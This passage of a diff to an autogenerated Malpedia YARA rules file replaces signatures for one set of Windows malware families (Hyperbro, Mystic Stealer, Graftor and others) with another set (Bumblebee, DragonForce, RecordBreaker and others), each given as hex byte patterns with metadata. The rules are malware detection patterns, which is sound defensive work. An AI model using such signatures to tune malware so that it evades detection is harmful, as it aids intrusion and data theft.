-		$sequence_2 = { 4883c002 bf0c000000 488906 eb05 bf0b000000 488d4c2420 488bd3 }
-		$sequence_3 = { 33d2 41b808020000 e8???????? 0fb754245c 0fb74c2458 0fb744245a 0fb77c2456 }
-		$sequence_4 = { e8???????? cc 8b4b28 488b4308 498bd4 }
-		$sequence_5 = { 4885c9 7406 ff15???????? 4883bb7002000008 720c 488b8b58020000 e8???????? }
-		$sequence_6 = { 488bd0 e8???????? 89442438 41b901000000 488d8b30330000 488d542438 458d4103 }
-		$sequence_7 = { 66f2af 48f7d1 4c8d41ff 488d55c0 488d4d90 e8???????? }
-		$sequence_8 = { 488bf1 488d151bbd0200 488d0d30d50200 e8???????? 4883c9ff 488bfe 488bd8 }
-		$sequence_9 = { 32c2 ffc2 3433 428884058f070000 83fa14 7ce4 4863c2 }
+		$sequence_0 = { c1e304 83e203 3355f8 33fb }
+		$sequence_1 = { e8???????? ff75ec 8ad8 c0fb02 }
+		$sequence_2 = { e8???????? c3 beff010000 56 }
+		$sequence_3 = { e8???????? 0ad8 59 881f }
+		$sequence_4 = { e8???????? 99 2bf7 f7fe 8bc2 }
+		$sequence_5 = { 0f8785000000 8a45ff c0fb04 c0e002 0ad8 881f }
+		$sequence_6 = { f7fb 5b 6a07 03f8 8bc1 }
+		$sequence_7 = { e8???????? 8bd8 8bc6 59 c6432000 8d7801 }
+		$sequence_8 = { 83ec10 8bfc 8db5f4f2ffff a5 a5 a5 }
+		$sequence_9 = { 385d08 7513 53 53 6a01 53 53 }
 
 	condition:
-		7 of them and filesize < 544768
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Hyperbro_Auto : FILE
+rule MALPEDIA_Win_Shatteredglass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0527accf-dc31-5cb1-be86-ae182f5b1e44"
+		id = "1439db5c-49a0-5968-b59a-03910a603b61"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hyperbro_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shatteredglass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shatteredglass_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "4b67c3c5bbc71bde556bbaa0da5f9d6d067d8c81b3b3ffbe7e62f8abebcb4ca9"
+		logic_hash = "f010e143a6683faf7af5372236553bb5fc1b43eebb2159b594f8f51e8251f8d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131548,32 +131407,32 @@ rule MALPEDIA_Win_Hyperbro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 e8???????? 8b5620 52 e8???????? 8b4614 50 }
-		$sequence_1 = { 83fe40 7e33 8b0f 51 e8???????? }
-		$sequence_2 = { 8a4b05 884f01 8b4308 83c410 50 8bc6 c7460840000000 }
-		$sequence_3 = { c70600000000 c7460400000000 8d5e0c e8???????? 83c404 }
-		$sequence_4 = { 0f8617feffff 8a17 8816 46 }
-		$sequence_5 = { 33ff 3bc7 7412 50 e8???????? 83c404 897e20 }
-		$sequence_6 = { 8b4614 8b1d???????? 83c404 3bc7 7406 50 ffd3 }
-		$sequence_7 = { 41 e9???????? 8b442410 8b6c2418 e9???????? 2b4c2428 8b44242c }
-		$sequence_8 = { 83c410 85ed 750e 8b7c2410 }
-		$sequence_9 = { 895c2430 895c2434 3bfb 7409 57 e8???????? 83c404 }
+		$sequence_0 = { 03f0 83fe10 7ce1 83fe10 752f }
+		$sequence_1 = { 7ce1 83fe10 752f eb29 }
+		$sequence_2 = { 0f8ecf000000 8b531c 8bca 8d7102 }
+		$sequence_3 = { 6a00 b810000000 2bc6 50 8d8640d74100 50 57 }
+		$sequence_4 = { eb02 32d2 8bc6 c0e104 d1e8 02ca 83c602 }
+		$sequence_5 = { 8d4900 0fb70c77 8d41d0 6683f809 7705 }
+		$sequence_6 = { 7705 80e937 eb10 8d419f 6683f819 7705 }
+		$sequence_7 = { 53 ff15???????? 80bd33ffffff00 0f8452ffffff 57 e8???????? }
+		$sequence_8 = { 2bce d1f9 83f918 740a 68???????? e9???????? }
+		$sequence_9 = { 72f1 33c0 5d c3 8b04c58c434100 5d c3 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 273408
 }
-rule MALPEDIA_Win_Ldr4_Auto : FILE
+rule MALPEDIA_Win_Bumblebee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c588634c-3a69-5c4e-b524-6b66db1c4a89"
+		id = "51e7861d-d3b9-5cdb-81c5-a532ba2bf356"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ldr4_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bumblebee_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "e747da5dcad3015b47810444cb7613ce4b06e63b04ebbc6ff8767e44ad66440e"
+		logic_hash = "55275cb4405b1783096501f885fe54bb72513b66b06e891fc6760c0a6547ff81"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131587,34 +131446,34 @@ rule MALPEDIA_Win_Ldr4_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8d45b4 50 53 33f6 56 }
-		$sequence_1 = { 8b4008 8945f4 a1???????? 53 35fc28b0ec 56 50 }
-		$sequence_2 = { c745f40c000000 c745fc01000000 895df8 ffd7 85c0 7508 }
-		$sequence_3 = { 53 56 57 8bf8 a1???????? 8b5808 8b07 }
-		$sequence_4 = { a1???????? 8b4008 89442404 85f6 0f84c9000000 8b4610 85c0 }
-		$sequence_5 = { 8b4008 57 8b3d???????? 6a40 8945f8 8d45b8 }
-		$sequence_6 = { ff15???????? 8bf0 85f6 750c 57 ff15???????? 6a08 }
-		$sequence_7 = { 3bc6 743c 56 56 ff75f4 }
-		$sequence_8 = { ff15???????? 8d4608 50 e8???????? 837e0400 7414 6aff }
-		$sequence_9 = { 35fc28b0ec 56 50 8b4508 8b402c e8???????? 85c0 }
+		$sequence_0 = { 488bd5 4889442428 498bce 488364242000 }
+		$sequence_1 = { 85c0 783c 488b9508030000 4885d2 }
+		$sequence_2 = { 4885c0 0f84b5000000 488d4c2430 41b900100000 48894c2420 4c8bc3 498bce }
+		$sequence_3 = { 33d2 488b4dc8 e8???????? 488b4dc8 }
+		$sequence_4 = { 90 ba38000000 488bcb e8???????? 90 }
+		$sequence_5 = { 4885f6 0f84ff000000 488b05???????? 4885c0 0f84ef000000 488d4c2430 41b900100000 }
+		$sequence_6 = { 488364242000 ffd7 8bc8 ffd3 }
+		$sequence_7 = { 488bd8 ff15???????? 488bcf 488945e5 }
+		$sequence_8 = { 488364242000 ffd7 8bc8 ffd3 4c8d5c2460 498b5b20 498b6b28 }
+		$sequence_9 = { ff15???????? 488d4c2438 33d2 48894c2420 448d4f30 }
 
 	condition:
-		7 of them and filesize < 117760
+		7 of them and filesize < 4825088
 }
-rule MALPEDIA_Win_Webc2_Cson_Auto : FILE
+rule MALPEDIA_Win_Karius_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6b87b7d-9114-5579-a68c-0816423dfdd5"
+		id = "f864f52d-97b4-52e1-be47-a43becf89939"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_cson_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.karius_auto.yar#L1-L233"
 		license_url = "N/A"
-		logic_hash = "6b0f4d165f53805d0d2ba6ef3f6dd5489f1ced5c22f12be382e768df751280a7"
+		logic_hash = "65d32f5659cb602716004ef37e85991451736e33f4d393130adf2e3c033195f4"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -131626,32 +131485,48 @@ rule MALPEDIA_Win_Webc2_Cson_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff35???????? ff15???????? 33ff e9???????? }
-		$sequence_1 = { ff15???????? 395dfc 7463 8d8540fdffff 6800020000 50 }
-		$sequence_2 = { e8???????? 68???????? 56 e8???????? 8d85f0feffff }
-		$sequence_3 = { 3bc3 8945f8 7513 68???????? ff15???????? 59 33c0 }
-		$sequence_4 = { 57 68???????? 6a50 68???????? }
-		$sequence_5 = { 3bf3 8975f8 0f8480010000 53 68???????? b8???????? 6a03 }
-		$sequence_6 = { 83c420 6a01 58 eb02 33c0 5f 5e }
-		$sequence_7 = { 8d85ec6bfeff 50 e8???????? 59 68e8030000 }
-		$sequence_8 = { 7512 55 ffd6 57 ffd6 68???????? ff15???????? }
-		$sequence_9 = { 83c418 50 ff15???????? e9???????? 8d45c0 }
+		$sequence_0 = { 41b830000000 488bcf ff15???????? 4885c0 }
+		$sequence_1 = { 85db 0f8477000000 8bb424b0000000 418b10 }
+		$sequence_2 = { 8bb424b0000000 418b10 8bcd 4903d6 0fb602 }
+		$sequence_3 = { 4d03d6 448bcd 85db 0f8477000000 }
+		$sequence_4 = { 488b05???????? 4885c0 7512 ff15???????? 488905???????? 4885c0 }
+		$sequence_5 = { 0f849d000000 41837b1400 0f8492000000 458b4320 458b5324 33ed }
+		$sequence_6 = { bf01000000 8bd7 498bce ffd3 4183bf8c00000000 }
+		$sequence_7 = { c3 85c0 7505 e8???????? b801000000 }
+		$sequence_8 = { 0f84b3000000 458b9f88000000 4d03de 418b5b18 85db 0f849d000000 }
+		$sequence_9 = { 41 ff45fc 42 ff45f8 }
+		$sequence_10 = { 8bc7 ffc8 7416 ffc8 }
+		$sequence_11 = { 81c200000100 8955f8 b804000000 8945fc 81fa80000000 7307 }
+		$sequence_12 = { 4d8bc7 488bd0 488bce ff15???????? }
+		$sequence_13 = { 7405 f60001 7502 33c0 }
+		$sequence_14 = { 48895c2420 4d8bcc 4d8bc7 488bd0 }
+		$sequence_15 = { 33d2 488bce ff15???????? 4c8bf0 4885c0 }
+		$sequence_16 = { 47 41 3bfb 0f825ffeffff }
+		$sequence_17 = { 7505 8d7b02 eb09 6685c0 }
+		$sequence_18 = { 8a17 80fa41 7c0d 80fa5a }
+		$sequence_19 = { ff15???????? 4c8be8 498bce ff15???????? 4d85ed }
+		$sequence_20 = { ebb0 8b5d10 8b750c 8b4d08 47 8b55f4 41 }
+		$sequence_21 = { 7e26 3c5b 750a 5e 894d0c }
+		$sequence_22 = { 488d4b10 488d542450 41b804000000 c6430f68 }
+		$sequence_23 = { 41 7411 43 3c5c }
+		$sequence_24 = { 4d8bcf 33d2 41b800001000 488bce }
+		$sequence_25 = { 7c04 3c39 7ee3 803f2e }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Grok_Auto : FILE
+rule MALPEDIA_Win_Spyder_Patchwork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9ba5cb5-3752-5e96-9a74-900c3065fa33"
+		id = "ff9f13ab-f307-5c96-9d42-3d8adb391da2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grok_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder_patchwork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spyder_patchwork_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0c97c5be712250fba8ecf0a25a041d30466c220a206e99d1c5c73f4b7d759714"
+		logic_hash = "a4925947525684eeb2c63af57878906d58b4bbbd5876d1885456e41c85c55b5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131665,32 +131540,32 @@ rule MALPEDIA_Win_Grok_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3945f4 7308 8b4df4 c60100 ebe4 8b55f8 c7420900000000 }
-		$sequence_1 = { 8b8de0fdffff 8a11 8895dffdffff 8b85e4fdffff 3a10 7546 }
-		$sequence_2 = { 837d1004 7307 b8060200c0 eb0e 8b4508 8b403c c70030120000 }
-		$sequence_3 = { 0f8ca4000000 53 ff15???????? 8b0d???????? 3b01 8b3d???????? }
-		$sequence_4 = { 0f85a2000000 681c010000 8d85c8feffff 50 6a00 8b4d08 51 }
-		$sequence_5 = { 8975dc ff15???????? 85c0 8b1d???????? 7d11 be2a0000c0 ff75f8 }
-		$sequence_6 = { a1???????? 83c40c c780bc01000001000000 33c0 5f 5e 5d }
-		$sequence_7 = { b81a0000c0 eb5c 50 8d460a 56 50 e8???????? }
-		$sequence_8 = { b89a0000c0 eb51 8d45f8 50 ff75f8 56 6a01 }
-		$sequence_9 = { 85c0 0f842d010000 8b742410 8b3d???????? 6a00 6a10 6a01 }
+		$sequence_0 = { 3930 0f8551010000 8b4004 83f82a 7429 83f839 7424 }
+		$sequence_1 = { ff74246c 50 e8???????? 83c410 5f 5e 5b }
+		$sequence_2 = { 8904a9 8b4c2444 8b44241c c1e002 0101 8b4c2458 8b442430 }
+		$sequence_3 = { e9???????? 6800030000 8d44242c 50 6a07 6801990000 e8???????? }
+		$sequence_4 = { 743c ba80000000 be00080000 0f1f8000000000 0fb60419 0fb70445403b4400 }
+		$sequence_5 = { e8???????? ff7620 e8???????? 56 e8???????? 83c420 5f }
+		$sequence_6 = { 741f 8b542410 3bca 7617 8b4608 2bca 51 }
+		$sequence_7 = { 8b4c242c 8d04b0 8b28 4e ba02000000 894c2414 89442420 }
+		$sequence_8 = { 6689460c 8b0f 8bc1 83e002 83c800 741d 668b4648 }
+		$sequence_9 = { ff15???????? 6a06 6a00 ff15???????? 6a00 6a00 6a00 }
 
 	condition:
-		7 of them and filesize < 84992
+		7 of them and filesize < 2260992
 }
-rule MALPEDIA_Win_Pkybot_Auto : FILE
+rule MALPEDIA_Win_Decaf_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "29bf327d-061e-5e00-99c9-e0f77546c9d5"
+		id = "c019d263-a899-5660-aa15-798e52adcd92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pkybot_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.decaf_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8f4c476e3b3790c8de41f37bef9cc1cce302daf7501c6563be237c0b8f2d2ef4"
+		logic_hash = "8c05c17767eead1f69d9ac7eb9dd704aba24d34223075b108957952ecaf7a6e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131704,32 +131579,32 @@ rule MALPEDIA_Win_Pkybot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 eb02 33f6 8b4704 0590000000 894620 }
-		$sequence_1 = { 33c0 e9???????? 53 6a10 ff7510 8d45f0 }
-		$sequence_2 = { 53 ff7004 ff30 6aff }
-		$sequence_3 = { 7407 46 8a06 84c0 79eb 8bc6 }
-		$sequence_4 = { 7510 8b4e04 21413c c741300d000000 }
-		$sequence_5 = { 6801000040 ff7510 ff750c e8???????? }
-		$sequence_6 = { 7503 8b7104 83c10c e8???????? 50 8bce }
-		$sequence_7 = { 8b07 8bcf ff5008 6a2c e8???????? }
-		$sequence_8 = { 8b4008 eb08 e8???????? 59 }
-		$sequence_9 = { 56 ff7510 ff750c ff7508 ff15???????? 85c0 }
+		$sequence_0 = { 488d6c2460 48c744247000000000 31c0 31c9 31d2 bb02000000 be67000000 }
+		$sequence_1 = { eb11 488d7818 488b8c2438240000 e8???????? 488b8c2470060000 48894808 833d????????00 }
+		$sequence_2 = { 44886c2446 440fb66c2464 44886c2445 440fb66c245d 44886c2444 440fb66c2466 44886c2443 }
+		$sequence_3 = { e9???????? 4983f806 754d 4c8d4301 4c39c6 7331 488d051d4d0f00 }
+		$sequence_4 = { eb14 488d7818 488b8c24081b0000 0f1f00 e8???????? 488b8c24080b0000 48894808 }
+		$sequence_5 = { e8???????? 488b0d???????? 48898c24e0000000 488d052c9c1300 e8???????? 833d????????00 750e }
+		$sequence_6 = { 488b6c2410 4883c418 c3 488d05f5bb1b00 48890424 e8???????? 450f57ff }
+		$sequence_7 = { e8???????? b911000000 4889c7 4889de 31c0 488d1d94e71700 e8???????? }
+		$sequence_8 = { e8???????? 488b442478 488b4c2470 488b942488000000 ebbd 90 488d05bfff1d00 }
+		$sequence_9 = { eb14 488d7818 488b8c2470220000 0f1f00 e8???????? 488b8c24a8030000 48894808 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 7193600
 }
-rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE
+rule MALPEDIA_Win_Imprudentcook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff6d02a5-11a9-5b9c-bc25-58f6a66b5d47"
+		id = "e985dc9d-907c-5ecd-b391-7678328944ea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mystic_stealer_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.imprudentcook_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "ec33f5bc78df8bf32bd1dfa20b10a2a5389598f3b75f6130cffa6e3d8120ea9d"
+		logic_hash = "df9f920c4e9fbf5202cbb078d209a88f010a87e5e4d8cea3492e3733d1c90a2b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131743,32 +131618,32 @@ rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7509 3bef 7505 33db 43 eb02 33db }
-		$sequence_1 = { 741f 8b0e 50 8b510c e8???????? 8b06 59 }
-		$sequence_2 = { 3b5c242c 7f59 66ff84463c0b0000 33c9 }
-		$sequence_3 = { e8???????? 83bd5014000002 59 59 }
-		$sequence_4 = { 8bc2 41 3bca 8b542418 0f4ec1 8b4c2414 89442430 }
-		$sequence_5 = { 8bcf c7460471000000 e8???????? 33c9 394e14 }
-		$sequence_6 = { 5b e9???????? a1???????? 8bcf c746049a020000 894718 e8???????? }
-		$sequence_7 = { 3bca 7420 0fb7449d02 8bca }
-		$sequence_8 = { 80ea03 c6040101 8b8ea0160000 8b8698160000 41 898ea0160000 c6040100 }
-		$sequence_9 = { 57 ffb42444010000 ffb4244c010000 50 }
+		$sequence_0 = { 49f7d0 48c1ef20 498bc0 48897c2420 48f7f7 488bc8 }
+		$sequence_1 = { 4981fd541f0000 7c24 488d0c5b 4881f9aa0f0000 7c17 488bcf 48895c2420 }
+		$sequence_2 = { 4c8d45f8 488d550f 488d4de7 4889442420 e8???????? 488d4d1f ff15???????? }
+		$sequence_3 = { 7303 4d03d7 488bca 48c1ea20 418bc3 48c1e120 4803c8 }
+		$sequence_4 = { 4c8bc7 498bd7 488bce 4889442420 e8???????? eb10 488bf5 }
+		$sequence_5 = { 488d55e7 483bc1 498bca 7d12 488b45df 4c894c2428 4d8bc8 }
+		$sequence_6 = { 458bda 488bd0 4885c0 783d 482bc7 498d0cc4 498bc5 }
+		$sequence_7 = { 493b45f0 752b 4883c8ff 498bd5 498bce 492bd7 492bcf }
+		$sequence_8 = { 4d892cc4 4f8d2cfc 4c8bcf 4d8bc5 498bd4 e8???????? 488bdf }
+		$sequence_9 = { 488b8424a0000000 4d8bc4 4889442420 e8???????? 4883c450 415f 415e }
 
 	condition:
-		7 of them and filesize < 465920
+		7 of them and filesize < 864256
 }
-rule MALPEDIA_Win_Graftor_Auto : FILE
+rule MALPEDIA_Win_Dragonforce_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "138ca116-cc68-528f-bf0e-7fb64c51da51"
+		id = "04e040d9-91b9-5636-bb88-ea712bdc46a2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graftor_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dragonforce"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dragonforce_auto.yar#L1-L90"
 		license_url = "N/A"
-		logic_hash = "a96a22ad70eb991290928c1f214241d1fdeb4091277b5b5fb893f50f8f3393f5"
+		logic_hash = "1983039dbcbe97b58972e2e24c645af80b3369f0d68152ff0fbf029f83aa4fd4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131782,32 +131657,30 @@ rule MALPEDIA_Win_Graftor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 393d???????? 7523 8d85fcbfffff 50 57 57 6a29 }
-		$sequence_1 = { 57 e8???????? 85c0 743f 8365fc00 8d45fc 50 }
-		$sequence_2 = { c3 53 8b5e14 57 8bf8 3bdf 771d }
-		$sequence_3 = { 5e 5d c20400 6a50 b8b69f4c00 e8???????? 8b7d10 }
-		$sequence_4 = { e8???????? 6800aa4d00 8db5ecbeffff c645fc04 e8???????? 8b8d58bfffff 33ff }
-		$sequence_5 = { e8???????? 845df0 740b 6a00 53 8d4db8 e8???????? }
-		$sequence_6 = { 741c 50 ff15???????? 85c0 7511 8b4604 3d58b74e00 }
-		$sequence_7 = { c68424a8030000fc 8d84244c020000 8bf4 89a424c4000000 50 e8???????? c68424a8030000fa }
-		$sequence_8 = { e8???????? 83c418 84c0 747f 66d16dc8 0fb745c8 }
-		$sequence_9 = { 897dac e8???????? 660fbe00 6a05 8d53bf 59 }
+		$sequence_0 = { 83ff01 7564 c745fc???????? bb???????? }
+		$sequence_1 = { 83c608 897dec 8b0481 8bc8 }
+		$sequence_2 = { 88943d09fdffff 47 83ff42 72d6 }
+		$sequence_3 = { 6690 85db 0f844ef4ffff 0fb607 }
+		$sequence_4 = { 8a85a9fcffff e8???????? 8985e0f5ffff 8d8d9cfcffff }
+		$sequence_5 = { 6a00 6a00 6a01 8d85dcfdffff }
+		$sequence_6 = { c6459002 c6459173 c6459202 c6459365 }
+		$sequence_7 = { c644243145 c64424323c c644243369 c64424343c }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 879616
 }
-rule MALPEDIA_Win_Eagerbee_Auto : FILE
+rule MALPEDIA_Win_Recordbreaker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a126278-7eb1-5d08-9b25-74b27f2a3312"
+		id = "84c578f1-7563-5244-9c52-c15658d206fd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eagerbee_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.recordbreaker_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "a3d744962e3184242280e8a1606b8e9d39f3a62e4bfb278481827290e0059489"
+		logic_hash = "47ce2cf43e0dd275e8c2b25425755b57837a7a72d47324aa716f84b51ead687c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131821,32 +131694,32 @@ rule MALPEDIA_Win_Eagerbee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3986f4160000 0f8576ffffff 8b8684000000 85c0 7809 488bd0 }
-		$sequence_1 = { 488d4c0422 44896309 e8???????? 8bd0 e9???????? 488d4c0421 e8???????? }
-		$sequence_2 = { 44396818 0f84b7010000 488d1de463ffff beffff0000 bd00010000 e9???????? 4439af90000000 }
-		$sequence_3 = { 885c247d 488b08 488d542470 ff5058 b9fb010000 488bd8 e8???????? }
-		$sequence_4 = { c684242b0100006d 4088bc242c010000 4088b4242d010000 48397308 0f84ae030000 488b05???????? c684249000000073 }
-		$sequence_5 = { 33c9 8bd7 41b800300000 ff15???????? 8b5500 }
-		$sequence_6 = { c644243432 c64424352e c644243664 884c2438 488d4c2430 c644243900 }
-		$sequence_7 = { 488d8c24e0040000 48894c2420 488b8c24e8040000 4c8bc3 ba01000000 ffd0 488b05???????? }
-		$sequence_8 = { 8a8424c0000000 8b9c24a8000000 488bbc2498000000 88442450 488b8424b8000000 498943e0 8a8424b0000000 }
-		$sequence_9 = { 4883ec38 83fa01 7528 488364242800 8364242000 }
+		$sequence_0 = { e8???????? 8b15???????? 8bc8 e8???????? 8b55f0 }
+		$sequence_1 = { 8a040e 46 8802 42 3bf3 72f5 }
+		$sequence_2 = { 51 8d4de4 51 ff750c a5 }
+		$sequence_3 = { ff15???????? 33c0 40 eb08 ff15???????? 33c0 5f }
+		$sequence_4 = { 8365f800 a1???????? c745f464000000 53 56 }
+		$sequence_5 = { 33c0 50 6800000008 6a02 50 50 }
+		$sequence_6 = { ba04010000 8d0c41 51 8d85d0fdffff 50 }
+		$sequence_7 = { ff15???????? 8b7508 83c410 8bd3 }
+		$sequence_8 = { 8b15???????? 8bc8 e8???????? 8b55f8 }
+		$sequence_9 = { 81ec68040000 837d1002 53 56 8bf2 57 }
 
 	condition:
-		7 of them and filesize < 422912
+		7 of them and filesize < 232312
 }
-rule MALPEDIA_Win_Bandit_Auto : FILE
+rule MALPEDIA_Win_Fickle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "baac7fff-4fa3-5458-b9c3-9ba2ff3fe15a"
+		id = "6879e197-d2fb-581d-9f88-69c75afc2e63"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bandit_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fickle_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "57d98c9e72ec66c58eb155bb6176131c752f20871acb7c0dc2253a7bf7e472fd"
+		logic_hash = "f140341d28c7aeaf4e7af75fed2cbbb86f7c4fb7ead43c1713a0301f74177602"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131860,34 +131733,34 @@ rule MALPEDIA_Win_Bandit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb24 31c0 488d5c241f b931000000 0f1f00 e8???????? 488bac2498000000 }
-		$sequence_1 = { eb1e 440fb64c341a 4183c1c3 4401ca 88543c1a 448844341a 4883c002 }
-		$sequence_2 = { 8854245f 0fb6542424 0fb6742421 29f2 88542460 31c0 488d5c2446 }
-		$sequence_3 = { eb1c 4889c7 488b8c2400110000 e8???????? 488d3d6bac7c00 e8???????? e8???????? }
-		$sequence_4 = { e8???????? 90 31c9 e8???????? 4885ff 750a 48895c2440 }
-		$sequence_5 = { eb1d 488d7808 488b9424501b0000 e8???????? 488d3dc0945f00 e8???????? 90 }
-		$sequence_6 = { e8???????? 488b8424c8000000 488b542430 488b7058 4885f6 7429 4889742448 }
